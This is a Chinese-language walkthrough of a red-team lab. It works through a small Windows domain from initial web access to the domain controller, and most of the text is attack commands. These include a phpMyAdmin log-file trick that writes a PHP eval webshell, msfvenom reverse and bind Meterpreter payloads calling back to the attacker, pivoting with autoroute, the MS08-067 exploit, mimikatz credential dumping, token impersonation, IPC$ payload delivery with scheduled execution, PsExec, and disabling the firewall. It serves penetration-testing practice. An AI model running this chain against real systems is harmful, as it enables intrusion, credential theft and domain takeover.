红队评估一

0x01 环境配置

windows7配置成NAT

windows2003添加一个网络适配器一个设置成NAT，另外一个设置为仅主机

windows2008配置成仅主机并修改IP地址

0x02 getshell

访问192.168.52.143是一个phpStudy探针

扫一下网站路径

扫到一个phpmyadmin，访问之后发现可以弱口令登录root/root

接下来可以参考phpmyadmin getshell，通过日志getshell

1
2
3

set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/shell.php';
select '<?php eval($_POST["pass"]); ?>'

绝对路径可以在探针里获得，接下来访问192.168.52.143/shell.php

已经成功getshell

0x03 提权

查看之后发现已经是Administrator，已经是比较高的权限了

现在去msf生成一个木马

1

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe

监听端口

1
2
3
4

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.128
set lport 60001

在蚁剑中执行shell.exe，可以看到成功反弹shell，接下来可以通过getsystem直接提升到system权限

0x04 内网渗透

首先需要知道内网存活的主机，通过ipconfig可以知道这台主机在192.168.52.1/24这个网段

1

run autoroute -s 192.168.52.1/24

添加一条路由

通过bg退出这个session，选择一个探测主机的脚本，这里我选择arp_scanner，当然别的也可以选择

1
2
3
4

use post/windows/gather/arp_scanner
set rhosts 192.168.52.1/24
set session 1
exploit

其中128是kali的地址，141是下一个需要渗透的主机的地址，143是windows7的地址，别的是一些内网其他主机的地址和本次实验无关

根据描述这里需要用到MS08_067，这里需要使用正向shell

1
2
3

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.52.141

可以看到直接是system了

通过ipconfig查看可以发现这台服务器有两张网卡出了192.168.52.141还有192.168.227.129，那就再添加一条路由然后扫描内网存活主机

1
2
3
4
5
6

run autoroute -s 192.168.227.1/24
bg
use post/windows/gather/arp_scanner
set rhosts 192.168.227.1/24
set session2
exploit

可以看到129是2003的地址，130是域控的地址，另外一个是网关地址

那么下一步是攻击域控

方法有很多，这次我准备用IPC$getshell

首先需要知道服务器的密码

这里使用msf自带的mimikatz去抓windows7的密码

1
2

load mimikatz
wdigest

可以直接看到明文密码hongrisec@2019

使用IPC$首先要切换用户，不然会报错

1
2
3

use incognito
list_tokens -u
impersonate_token GOD\\administrator

可以看到已经切换用户了

1
2

net use \\192.168.227.130\IPC$ hongrisec@2019 /user:administrator
dir \\192.168.227.130\C$

可以读取C盘下的文件

新建一个32位的木马，这里要正向

1

msfvenom -p windows/meterpreter/bind_tcp LHOST=<ip> LPORT=<port> -f exe > shell32.exe

现在将木马发送到windows2003上，通过IPC$将木马传输到windows2008

1
2
3

copy shell32.exe \\192.168.227.130\C$\
net time \\192.168.227.130
at \\192.168.227.130 10:53 c:\shell32.exe

首先将木马复制到130的C盘下，然后查看这台服务器的时间，最后设置定时启动

但是这里不能直接反弹回来，因为有防火墙，所以要先将防火墙关闭

这里使用PsExec.exe执行命令

将这个文件上传到windows7上并执行

1

PsExec.exe \\192.168.227.130 -u administrator -p hongrisec@2019 cmd

不管是msf还是nc反弹回来的shell虽然是交互式的但好像和原生的还是不一样，可以执行这条命令但是连接不上，如果直接在windows7上执行是可以连接上的，所以想别的方法，现在想到的是通过msf的远程桌面连接windows7然后再执行命令

1

run getgui -e #开启远程桌面

然后开启另外一个shell输入

1

rdesktop 192.168.52.143:3389

接下来输入用户名和密码登录

1
2

GOD\administrator
hongrisec@2019

已经登录成功了

接下来再次输入上面PsExec.exe的命令去连接windows2008

可以看到已经成功连接上了，关闭防火墙

1

netsh advfirewall set allprofiles state off

重复上面的方法，监听端口执行木马

成功返回了shell，因为是高权限可以最直接通过getsystem提权

0x05 总结

看了一下别的师傅做的都是msf和cs一起使用，cs有拓扑图，会比较清晰一点，下次也试着用一下

前面两台主机还好，最后的域控是花了不少时间，虽然永恒之蓝可以直接攻击，但是还是想尝试一下别的方法